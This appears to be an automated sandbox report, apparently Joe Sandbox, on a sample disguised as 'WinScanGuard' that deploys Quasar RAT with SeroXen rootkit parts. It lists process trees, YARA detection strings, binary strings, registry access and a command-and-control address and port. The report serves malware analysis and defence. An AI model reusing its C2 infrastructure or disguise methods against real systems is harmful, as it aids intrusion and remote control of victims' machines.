              • svchost.exe (PID: 696 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
              • svchost.exe (PID: 592 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • dllhost.exe (PID: 6020 cmdline: C:\Windows\System32\dllhost.exe /Processid:{59453cd9-80c7-4c7f-84ca-38ec20f032b9} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
            • dllhost.exe (PID: 6700 cmdline: C:\Windows\System32\dllhost.exe /Processid:{8b9e4941-156b-4561-b75c-88dc752d3d8b} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
          • lsass.exe (PID: 628 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)
          • svchost.exe (PID: 920 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
          • dwm.exe (PID: 988 cmdline: dwm.exe MD5: 5C27608411832C5B39BA04E33D53536C)
        • dllhost.exe (PID: 8 cmdline: C:\Windows\SysWOW64\dllhost.exe /Processid:{f5381469-1700-4694-82dd-1722ad94b3e0} MD5: 6F3C9485F8F97AC04C8E43EF4463A68C)
          • WmiPrvSE.exe (PID: 2720 cmdline: C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding MD5: 64ACA4F48771A5BA50CD50F2410632AD)
          • PHZMpSLEzcFKaRUZszZmeOVApLd.exe (PID: 3848 cmdline: "C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • PHZMpSLEzcFKaRUZszZmeOVApLd.exe (PID: 4008 cmdline: "C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • dllhost.exe (PID: 3164 cmdline: C:\Windows\SysWOW64\dllhost.exe /Processid:{8c0bd129-911b-4af2-a0bc-93995d45cd5f} MD5: 6F3C9485F8F97AC04C8E43EF4463A68C)
          • PHZMpSLEzcFKaRUZszZmeOVApLd.exe (PID: 2736 cmdline: "C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • dllhost.exe (PID: 6280 cmdline: C:\Windows\SysWOW64\dllhost.exe /Processid:{0979c3ff-3e63-4ea9-9d2b-0e24c33cbca9} MD5: 6F3C9485F8F97AC04C8E43EF4463A68C)
        • dllhost.exe (PID: 2344 cmdline: C:\Windows\SysWOW64\dllhost.exe /Processid:{da1a065e-b06d-4c17-9fd5-69413fe213f9} MD5: 6F3C9485F8F97AC04C8E43EF4463A68C)
        • dllhost.exe (PID: 2664 cmdline: C:\Windows\SysWOW64\dllhost.exe /Processid:{2c62f067-a6a0-49cc-8f1a-bf6b18a4e5be} MD5: 6F3C9485F8F97AC04C8E43EF4463A68C)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Quasar RAT, QuasarRATQuasar RAT is a malware family written in .NET which is used by a variety of attackers. The malware is fully functional and open source, and is often packed to make analysis of the source more difficult.
  • APT33
  • Dropping Elephant
  • Stone Panda
  • The Gorgon Group
https://malpedia.caad.fkie.fraunhofer.de/details/win.quasar_rat
No configs have been found
SourceRuleDescriptionAuthorStrings
00000002.00000002.2138245203.0000020C8051D000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
    00000012.00000002.2928056042.0000028528D41000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
      00000002.00000002.2138245203.0000020C81961000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
          00000012.00000002.3104746555.0000028539051000.00000004.00000800.00020000.00000000.sdmpQuasar_RAT_1Detects Quasar RATFlorian Roth
          • 0x3a67e8:$op1: 04 1E FE 02 04 16 FE 01 60
          • 0x3f6820:$op1: 04 1E FE 02 04 16 FE 01 60
          • 0x3a670c:$op2: 00 17 03 1F 20 17 19 15 28
          • 0x3f6744:$op2: 00 17 03 1F 20 17 19 15 28
          • 0x3a7152:$op3: 00 04 03 69 91 1B 40
          • 0x3a797b:$op3: 00 04 03 69 91 1B 40
          • 0x3f718a:$op3: 00 04 03 69 91 1B 40
          • 0x3f79b3:$op3: 00 04 03 69 91 1B 40
          Click to see the 3 entries
          SourceRuleDescriptionAuthorStrings
          18.2.$sxr-powershell.exe.28538ad9110.10.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            18.2.$sxr-powershell.exe.28538ad9110.10.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              18.2.$sxr-powershell.exe.285393991b8.13.unpackQuasar_RAT_1Detects Quasar RATFlorian Roth
              • 0x5c830:$op1: 04 1E FE 02 04 16 FE 01 60
              • 0xac868:$op1: 04 1E FE 02 04 16 FE 01 60
              • 0x5c754:$op2: 00 17 03 1F 20 17 19 15 28
              • 0xac78c:$op2: 00 17 03 1F 20 17 19 15 28
              • 0x5d19a:$op3: 00 04 03 69 91 1B 40
              • 0x5d9c3:$op3: 00 04 03 69 91 1B 40
              • 0xad1d2:$op3: 00 04 03 69 91 1B 40
              • 0xad9fb:$op3: 00 04 03 69 91 1B 40
              18.2.$sxr-powershell.exe.285393991b8.13.raw.unpackQuasar_RAT_1Detects Quasar RATFlorian Roth
              • 0x5e630:$op1: 04 1E FE 02 04 16 FE 01 60
              • 0xae668:$op1: 04 1E FE 02 04 16 FE 01 60
              • 0x5e554:$op2: 00 17 03 1F 20 17 19 15 28
              • 0xae58c:$op2: 00 17 03 1F 20 17 19 15 28
              • 0x5ef9a:$op3: 00 04 03 69 91 1B 40
              • 0x5f7c3:$op3: 00 04 03 69 91 1B 40
              • 0xaefd2:$op3: 00 04 03 69 91 1B 40
              • 0xaf7fb:$op3: 00 04 03 69 91 1B 40
              18.2.$sxr-powershell.exe.28539411228.18.raw.unpackQuasar_RAT_1Detects Quasar RATFlorian Roth
              • 0x365f8:$op1: 04 1E FE 02 04 16 FE 01 60
              • 0x3651c:$op2: 00 17 03 1F 20 17 19 15 28
              • 0x36f62:$op3: 00 04 03 69 91 1B 40
              • 0x3778b:$op3: 00 04 03 69 91 1B 40
              Click to see the 3 entries
              No Sigma rule has matched
              No Snort rule has matched

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: Yara matchFile source: Process Memory Space: $sxr-powershell.exe PID: 5088, type: MEMORYSTR
              Source: eu-central-7075.packetriot.netVirustotal: Detection: 15%Perma Link

              Compliance

              barindex
              Source: C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exeUnpacked PE file: 37.2.PHZMpSLEzcFKaRUZszZmeOVApLd.exe.2100000.2.unpack
              Source: C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exeUnpacked PE file: 37.2.PHZMpSLEzcFKaRUZszZmeOVApLd.exe.2270000.5.unpack
              Source: C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exeUnpacked PE file: 37.2.PHZMpSLEzcFKaRUZszZmeOVApLd.exe.2290000.6.unpack
              Source: C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exeUnpacked PE file: 37.2.PHZMpSLEzcFKaRUZszZmeOVApLd.exe.2310000.8.unpack
              Source: C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exeUnpacked PE file: 39.2.PHZMpSLEzcFKaRUZszZmeOVApLd.exe.2420000.4.unpack
              Source: C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exeUnpacked PE file: 39.2.PHZMpSLEzcFKaRUZszZmeOVApLd.exe.2440000.5.unpack
              Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: costura.sharpdx.dxgi.pdb.compressed|||SharpDX.DXGI.pdb|D73E59804E3EE494A4612185771F7F67B2FD64AE|34752 source: $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: costura.sharpdx.direct3d11.pdb.compressed source: $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: mshta.pdbGCTL source: $sxr-mshta.exe, 0000000D.00000000.1920454183.00007FF7142F2000.00000002.00000001.01000000.00000008.sdmp, $sxr-mshta.exe, 0000000D.00000002.2918096738.00007FF7142F2000.00000002.00000001.01000000.00000008.sdmp, $sxr-mshta.exe.2.dr
              Source: Binary string: costura.costura.pdb.compressed source: WinScanGuard_v.2.1.bat.exe, 00000002.00000002.2138245203.0000020C8051D000.00000004.00000800.00020000.00000000.sdmp, $sxr-powershell.exe, 00000012.00000002.2928056042.0000028528D41000.00000004.00000800.00020000.00000000.sdmp, $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: costura.sharpdx.pdb.compressed|||SharpDX.pdb|1A7C10AA582CCEEBFFD9BC77A11353AAAE6417E9|42824 source: $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: #costura.sharpdx.dxgi.pdb.compressed source: $sxr-powershell.exe, 00000012.00000002.2928056042.0000028528D41000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: costura.sharpdx.pdb.compressed source: $sxr-powershell.exe, 00000012.00000002.2928056042.0000028528D41000.00000004.00000800.00020000.00000000.sdmp, $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net452\Microsoft.Win32.TaskScheduler.pdbSHA256 source: WinScanGuard_v.2.1.bat.exe, 00000002.00000002.2138245203.0000020C81961000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: cmd.pdb source: $sxr-cmd.exe, 00000010.00000000.1933753020.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp, $sxr-cmd.exe, 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp, $sxr-cmd.exe.2.dr
              Source: Binary string: mshta.pdb source: $sxr-mshta.exe, 0000000D.00000000.1920454183.00007FF7142F2000.00000002.00000001.01000000.00000008.sdmp, $sxr-mshta.exe, 0000000D.00000002.2918096738.00007FF7142F2000.00000002.00000001.01000000.00000008.sdmp, $sxr-mshta.exe.2.dr
              Source: Binary string: <Module>costura.metadatacostura.sharpdx.direct3d11.pdb.compressedcostura.costura.pdb.compressedcostura.sharpdx.dxgi.pdb.compressedcostura.sharpdx.pdb.compressedcostura.sharpdx.direct3d11.dll.compressedcostura.costura.dll.compressedcostura.sharpdx.dxgi.dll.compressedcostura.gma.system.mousekeyhook.dll.compressedcostura.system.runtime.interopservices.runtimeinformation.dll.compressedcostura.quasar.common.dll.compressedcostura.newtonsoft.json.dll.compressedcostura.bouncycastle.crypto.dll.compressedcostura.ionic.zip.dll.compressedcostura.microsoft.win32.taskscheduler.dll.compressedcostura.de.microsoft.win32.taskscheduler.resources.dll.compressedcostura.pl.microsoft.win32.taskscheduler.resources.dll.compressedcostura.zh-cn.microsoft.win32.taskscheduler.resources.dll.compressedcostura.fr.microsoft.win32.taskscheduler.resources.dll.compressedcostura.es.microsoft.win32.taskscheduler.resources.dll.compressedcostura.it.microsoft.win32.taskscheduler.resources.dll.compressedcostura.zh-hant.microsoft.win32.taskscheduler.resources.dll.compressedcostura.ru.microsoft.win32.taskscheduler.resources.dll.compressedcostura.protobuf-net.dll.compressedcostura.sharpdx.dll.compressed4a731784-801d-481b-a36f-654a2936777eQuasar.Client.InstallStager.exeQuasar.Client.UninstallStager.exeQuasar.Client.ResetPatcher.binQuasar.Client.QuasarApplication.resourcesQuasar.Client.Properties.Resources.resourcesILRepack.List source: $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: C:\Users\C5\Documents\SeroXen Stuff\Quasar-master\Quasar-master-release\bin\Release\net452\REPOS\seroxen rootkit stuff\InstallStager\bin\Release\InstallStager.pdb source: $sxr-powershell.exe, 00000012.00000002.3104746555.000002853878B000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: costura.sharpdx.dxgi.pdb.compressed source: $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: PHZMpSLEzcFKaRUZszZmeOVApLd.exe, 00000025.00000000.2071708899.000000000059E000.00000002.00000001.01000000.0000000E.sdmp, PHZMpSLEzcFKaRUZszZmeOVApLd.exe, 00000027.00000000.2076760645.000000000059E000.00000002.00000001.01000000.0000000E.sdmp, PHZMpSLEzcFKaRUZszZmeOVApLd.exe, 0000002B.00000000.2087575742.000000000059E000.00000002.00000001.01000000.0000000E.sdmp
              Source: Binary string: cmd.pdbUGP source: $sxr-cmd.exe, 00000010.00000000.1933753020.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp, $sxr-cmd.exe, 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp, $sxr-cmd.exe.2.dr
              Source: Binary string: costura.sharpdx.direct3d11.pdb.compressed|||SharpDX.Direct3D11.pdb|A2259A45EA284247B3AA65EC9C1DBEBD47FE208F|78220 source: $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: powershell.pdbUGP source: WinScanGuard_v.2.1.bat.exe, 00000002.00000000.1726165397.00007FF60EAAA000.00000002.00000001.01000000.00000003.sdmp, $sxr-powershell.exe.2.dr, WinScanGuard_v.2.1.bat.exe.0.dr
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net452\Microsoft.Win32.TaskScheduler.pdb source: WinScanGuard_v.2.1.bat.exe, 00000002.00000002.2138245203.0000020C81961000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: powershell.pdb source: WinScanGuard_v.2.1.bat.exe, 00000002.00000000.1726165397.00007FF60EAAA000.00000002.00000001.01000000.00000003.sdmp, $sxr-powershell.exe.2.dr, WinScanGuard_v.2.1.bat.exe.0.dr
              Source: Binary string: costura.costura.pdb.compressed|||Costura.pdb|6C6000A5EAF8579850AB82A89BD6268776EB51AD|2608 source: $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: )costura.sharpdx.direct3d11.pdb.compressed source: $sxr-powershell.exe, 00000012.00000002.2928056042.0000028528D41000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: ura.costura.pdb.X source: WinScanGuard_v.2.1.bat.exe, 00000002.00000002.2138245203.0000020C81961000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: costura.costura.pdb.compressed8 source: WinScanGuard_v.2.1.bat.exe, 00000002.00000002.2138245203.0000020C81961000.00000004.00000800.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32Jump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32Jump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32Jump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
              Source: C:\Windows\$sxr-powershell.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
              Source: C:\Windows\$sxr-powershell.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
              Source: C:\Windows\$sxr-mshta.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
              Source: C:\Windows\$sxr-mshta.exeFile opened: C:\Users\userJump to behavior
              Source: C:\Windows\$sxr-mshta.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
              Source: C:\Windows\$sxr-mshta.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
              Source: C:\Windows\$sxr-mshta.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
              Source: C:\Windows\$sxr-mshta.exeFile opened: C:\Users\user\AppDataJump to behavior
              Source: C:\Windows\$sxr-mshta.exeCode function: 13_2_000001A00BDBBEDC FindFirstFileExW,13_2_000001A00BDBBEDC
              Source: C:\Windows\$sxr-cmd.exeCode function: 16_2_0000020D0B62BEDC FindFirstFileExW,16_2_0000020D0B62BEDC
              Source: C:\Windows\$sxr-cmd.exeCode function: 16_2_00007FF61550823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,16_2_00007FF61550823C
              Source: C:\Windows\$sxr-cmd.exeCode function: 16_2_00007FF615502978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,16_2_00007FF615502978
              Source: C:\Windows\$sxr-cmd.exeCode function: 16_2_00007FF6154F1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,16_2_00007FF6154F1560
              Source: C:\Windows\$sxr-cmd.exeCode function: 16_2_00007FF6154F35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,16_2_00007FF6154F35B8
              Source: C:\Windows\$sxr-cmd.exeCode function: 16_2_00007FF615517B4C FindFirstFileW,FindNextFileW,FindClose,16_2_00007FF615517B4C
              Source: C:\Windows\$sxr-powershell.exeCode function: 21_2_00000242878BBEDC FindFirstFileExW,21_2_00000242878BBEDC
              Source: C:\Windows\System32\winlogon.exeCode function: 24_2_00000225DC64BEDC FindFirstFileExW,24_2_00000225DC64BEDC
              Source: C:\Windows\System32\lsass.exeCode function: 25_2_00000202C0AEBEDC FindFirstFileExW,25_2_00000202C0AEBEDC
              Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeCode function: 26_2_04029AE0 FindFirstFileExW,26_2_04029AE0
              Source: C:\Windows\System32\svchost.exeCode function: 27_2_000002A66130BEDC FindFirstFileExW,27_2_000002A66130BEDC
              Source: C:\Windows\System32\svchost.exeCode function: 27_2_000002A66136BEDC FindFirstFileExW,27_2_000002A66136BEDC
              Source: C:\Windows\System32\dwm.exeCode function: 30_2_000002BAB14BBEDC FindFirstFileExW,30_2_000002BAB14BBEDC
              Source: C:\Windows\System32\svchost.exeCode function: 31_2_0000026A87F4BEDC FindFirstFileExW,31_2_0000026A87F4BEDC
              Source: C:\Windows\System32\svchost.exeCode function: 36_2_00000179537ABEDC FindFirstFileExW,36_2_00000179537ABEDC
              Source: C:\Windows\System32\svchost.exeCode function: 36_2_0000017953D4BEDC FindFirstFileExW,36_2_0000017953D4BEDC
              Source: Joe Sandbox ViewASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
              Source: Joe Sandbox ViewIP Address: 167.71.56.116 167.71.56.116
              Source: global trafficTCP traffic: 192.168.2.4:49736 -> 167.71.56.116:22112
              Source: $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertCSRSA4096RootG5.crt0E
              Source: lsass.exe, 00000019.00000000.2047005510.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000002.2911169498.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: lsass.exe, 00000019.00000000.2047005510.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000002.2911169498.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000002.2908552119.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000000.2046537814.00000202BFC89000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
              Source: lsass.exe, 00000019.00000000.2047005510.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000002.2911169498.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000000.2046960383.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000002.2911011421.00000202C0379000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
              Source: $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA2.crt0
              Source: $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertCSRSA4096RootG5.crl0
              Source: lsass.exe, 00000019.00000000.2047005510.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000002.2911169498.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: lsass.exe, 00000019.00000000.2047005510.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000002.2911169498.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000002.2908552119.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000000.2046537814.00000202BFC89000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
              Source: $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
